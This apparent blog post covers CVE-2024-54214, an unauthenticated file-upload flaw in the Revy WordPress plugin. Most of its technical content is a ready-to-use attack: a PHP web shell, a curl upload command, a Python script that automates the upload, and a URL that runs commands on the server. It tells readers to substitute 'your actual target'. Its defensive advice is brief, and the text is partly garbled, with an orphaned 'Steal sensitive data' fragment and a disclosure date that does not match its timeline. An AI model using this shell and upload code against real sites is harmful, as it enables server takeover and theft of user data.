In June 2024, security researchers publicly disclosed a critical vulnerability in the Roninwp Revy WordPress plugin. Labeled CVE-2024-54214, this flaw allows any unauthenticated attacker to upload dangerous files—like PHP web shells—to your web server. If you use Revy (versions up to 1.18), your site is at *serious risk*, and immediate action is required.
This post breaks down how CVE-2024-54214 works, how to exploit it with real code snippets, and what steps you should take next.
What is Roninwp Revy?
Roninwp Revy is a WordPress plugin that allows users to add review features to their websites—think star ratings, pros & cons, and more. According to official stats, thousands of WordPress websites use this plugin to boost engagement and build trust with visitors.
CVE-2024-54214: The Heart of the Vulnerability
The critical bug exists in how Revy handles file uploads. In versions up to 1.18, the plugin does not properly check file types before saving them to the server. That means an attacker can upload ANY file—even a file with PHP code inside it.
Once uploaded, the attacker can visit the file’s URL directly and run whatever code they’ve placed inside—which usually means taking over your site.
Exploiting the Flaw: Uploading a Web Shell
If file upload controls aren’t strict, it's trivial for an attacker to upload a “web shell”—a script that lets them run commands on your server right from their browser. It’s as easy as submitting a POST request to the vulnerable file upload endpoint.
Below is a basic web shell (never use this except for *defensive* research on your own systems!)
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; system($_REQUEST['cmd']); echo "</pre>"; } ?>
When saved as shell.php, an attacker can upload it via the plugin’s upload functionality.
Here's a sample curl command to exploit the vulnerability
curl -F "file=@shell.php" https://targetsite.com/wp-content/plugins/revy/upload.php
> Replace: shell.php with your crafted payload, and targetsite.com with your actual target.
Here’s how you could automate the attack using Python
import requests
url = 'https://targetsite.com/wp-content/plugins/revy/upload.php'
files = {'file': ('shell.php', open('shell.php', 'rb'), 'application/x-php')}
response = requests.post(url, files=files)
if response.status_code == 200:
print("File uploaded. Check the uploads folder!")
else:
print("Upload failed.")
After uploading, you’d access:
https://targetsite.com/wp-content/plugins/revy/uploads/shell.php?cmd=whoami
This would run the whoami command on the server and print the result.
Note: Some deployments may use different paths for uploaded files.
Steal sensitive data (user info, customer orders, etc.)
Many WordPress users don’t monitor uploads or file changes, so an attacker could remain undetected for a long time.
Scan Your Site for Unknown Files
- Use security plugins like Wordfence or Sucuri to check for backdoors.
- Review the /wp-content/plugins/revy/ and any upload directories for suspicious files (ex: .php files uploaded recently).
Monitor for Future Updates
- Follow the plugin’s official page or subscribe to vulnerability trackers.
References
- Original Vulnerability Report (WPScan)
- National Vulnerability Database (NVD) for CVE-2024-54214
- WordPress Plugin Directory - Roninwp Revy
- PHP Web Shells: What They Are & How They Work
Conclusion
CVE-2024-54214 is a textbook example of how a small mistake—forgetting to check file types—can turn into a full-scale security disaster. Anyone running a version of Revy up to 1.18 must act fast to secure their sites. If you manage a WordPress site, always watch for plugin updates and follow best security practices like restricting upload file types and scanning for malware.
Timeline
Published on: 12/06/2024 14:15:26 UTC
Last modified on: 12/20/2024 13:15:21 UTC